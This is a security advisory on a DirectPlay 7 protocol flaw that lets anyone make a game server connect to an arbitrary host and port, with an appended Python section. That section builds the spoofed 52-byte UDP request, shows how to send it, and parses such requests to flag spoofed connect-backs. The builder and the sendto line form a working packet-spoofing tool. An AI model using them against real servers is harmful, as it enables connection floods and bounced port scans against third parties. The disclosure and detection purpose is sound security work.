#######################################################################
How to use DirectPlay 7 to create spoofed TCP connections 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org
#######################################################################

All versions of DirectPlay before 8 (so every DirectPlay version from the first one until one or two years ago) use a strange and bad method to manage players. To join a DirectPlay game server a client must do the following:

  client binds a TCP port (usually 2300)
  client -> server: UDP packet (to port 47624)
  server -> client: TCP connection
  exchange of data...

The part we need to understand is the UDP packet sent from the client to the server. Its structure is similar to the following; the symbol ??? marks a field whose meaning I don't know:

  "\x34\x00"                                 size of the entire packet (0x34 = 52 bytes)
  "\xB0\xFA"                                 DirectPlay sign
  "\x00\x00"                                 client family [1]
  "\x00\x00"                                 client TCP port [1]
  "\x00\x00\x00\x00"                         client IP address [1]
  "\0\0\0\0\0\0\0\0"                         ??? always 0
  "play"                                     we wanna play
  "\x02\x00"                                 ??? always 2
  "\x0E\x00"                                 ??? always 14
  "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"         GUID [2]
  "\x00\x00\x00\x00"                         ??? always 0
  "\x01\x00\x00\x00"                         ???

[1] The UDP packet contains a sockaddr_in structure that the server uses to make the TCP connection back to the client. A sockaddr_in holds the address family (AF_INET, value 2, meaning we want an Internet address), the TCP port on which the client waits for the connection and the IP address to contact. The 8 zero bytes that follow the address are exactly the size of the structure's sin_zero padding, so the whole 16-byte sockaddr_in appears to be copied into the packet as it is kept in memory. If the IP is set to 0 the server uses the source IP address of the UDP packet. Note that the game server will not reconnect to a host and port it is already connected to; it simply sends a bit of data through the existing connection.

[2] The GUID is used by Windows to identify programs and similar objects. It is used here because the GUID we specify must match the one of the game server, otherwise the packet is rejected.
BUT there is a workaround: with a GUID of all zeros our packet is accepted even if we don't know the GUID used by that specific game!

The most interesting part of the packet is therefore the sockaddr_in structure, which lets ANY person force a game server using the DirectPlay protocol to connect to ANY TCP port of ANY host we desire.

The first risk is that someone contacts a lot of DirectPlay game servers and makes them all connect to a specific port of one host (a webserver, for example), consuming its resources, but "currently" I don't know of a DirectPlay game that is so widely used. This type of attack needs a lot of servers, otherwise it can't be considered a risk, and now that the new DirectPlay protocol (available from DirectX 8 and 9) has taken the place of the old one, all new games will use it, so they are not vulnerable.

Another risk is "indirect": some system admins don't like port scans, and an attacker could use this DirectPlay problem to launch a port scan from the victim game server against the server of a paranoid admin. That gives no results or information to the attacker, but it "could" be a small problem for the owner of the game server (why are you scanning my server?).

However, the only thing I think is really important here is that this "problem" (it is not a bug but a feature of the DirectPlay protocol) is interesting and cool enough, in my opinion.

A proof-of-concept is available here:
http://aluigi.org/papers/dplay7-spoof.zip

#######################################################################
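As an added example (not part of the original advisory or of its proof-of-concept), the following Python code builds the 52-byte UDP request from the template above with an embedded sockaddr_in of our choice and the all-zero GUID workaround, and parses such a request back, so that a detection rule can flag requests whose embedded address is not the UDP sender (the spoofed connect-back described in the advisory). The function names, the field names and the sample addresses are my own; beyond what the advisory states, the code assumes that sin_family is stored little-endian as in the Windows in-memory sockaddr_in and that sin_port and sin_addr are in network byte order as the structure requires.

```python
import ipaddress
import struct

# Constants taken from the advisory's packet template.
DPLAY_SIGN = b"\xb0\xfa"
DPLAY_ENUM_PORT = 47624       # UDP port the request is sent to
PACKET_SIZE = 0x34            # 52 bytes, the size field of the template
AF_INET = 2                   # sockaddr_in family value for IPv4
ZERO_GUID = b"\x00" * 16      # accepted by any game (the advisory's workaround)


def build_dplay7_request(connect_back_ip, connect_back_port, guid=ZERO_GUID):
    """Build the pre-DirectPlay8 UDP request with an embedded sockaddr_in.

    Assumption (mine, not stated in the advisory): sin_family is little-endian
    as in the Windows in-memory layout, sin_port and sin_addr are network order.
    """
    if not 0 <= connect_back_port <= 0xFFFF:
        raise ValueError("port out of range")
    if len(guid) != 16:
        raise ValueError("GUID must be 16 bytes")
    sockaddr_in = (
        struct.pack("<H", AF_INET)                        # sin_family
        + struct.pack("!H", connect_back_port)            # sin_port
        + ipaddress.IPv4Address(connect_back_ip).packed   # sin_addr; 0.0.0.0 = use UDP source
        + b"\x00" * 8                                     # sin_zero ("always 0")
    )
    tail = (
        b"play"
        + struct.pack("<H", 2)        # "always 2" in the advisory, meaning unknown
        + struct.pack("<H", 14)       # "always 14", meaning unknown
        + guid                        # must match the game's GUID, or be all zeros
        + struct.pack("<I", 0)        # "always 0"
        + struct.pack("<I", 1)        # unknown trailing field
    )
    pkt = struct.pack("<H", PACKET_SIZE) + DPLAY_SIGN + sockaddr_in + tail
    assert len(pkt) == PACKET_SIZE
    return pkt


def parse_dplay7_request(pkt):
    """Split a request into its fields; raise ValueError if it isn't one."""
    if len(pkt) != PACKET_SIZE:
        raise ValueError("wrong length")
    size, sign = struct.unpack_from("<H2s", pkt, 0)
    if size != PACKET_SIZE or sign != DPLAY_SIGN:
        raise ValueError("not a DirectPlay request")
    if pkt[20:24] != b"play":
        raise ValueError("missing play marker")
    family, = struct.unpack_from("<H", pkt, 4)
    port, = struct.unpack_from("!H", pkt, 6)
    guid = pkt[28:44]
    return {
        "family": family,
        "port": port,
        "ip": str(ipaddress.IPv4Address(pkt[8:12])),
        "guid": guid,
        "guid_is_zero": guid == ZERO_GUID,
    }


def connect_back_target(pkt, udp_src_ip):
    """Host and port the server will open its TCP connection to.

    Per the advisory, an all-zero IP means "use the UDP packet's source".
    """
    fields = parse_dplay7_request(pkt)
    ip = udp_src_ip if fields["ip"] == "0.0.0.0" else fields["ip"]
    return ip, fields["port"]


def is_spoofed_connect_back(pkt, udp_src_ip):
    """Detection check: the embedded address is not the host that sent the UDP packet."""
    ip, _ = connect_back_target(pkt, udp_src_ip)
    return ip != udp_src_ip


if __name__ == "__main__":
    # Constructed sample: a request arriving from 192.0.2.1 that asks the
    # server to connect to TCP port 80 of 198.51.100.7 instead of the sender.
    pkt = build_dplay7_request("198.51.100.7", 80)
    print(pkt.hex())
    print(connect_back_target(pkt, "192.0.2.1"))
    print(is_spoofed_connect_back(pkt, "192.0.2.1"))
```

To actually send the request you would use a plain UDP socket, `sock.sendto(pkt, (server, DPLAY_ENUM_PORT))`; on the defensive side the parser run over UDP/47624 traffic gives a simple rule: a request whose embedded IP is neither 0.0.0.0 nor the UDP source address is asking the game server to connect to a third party.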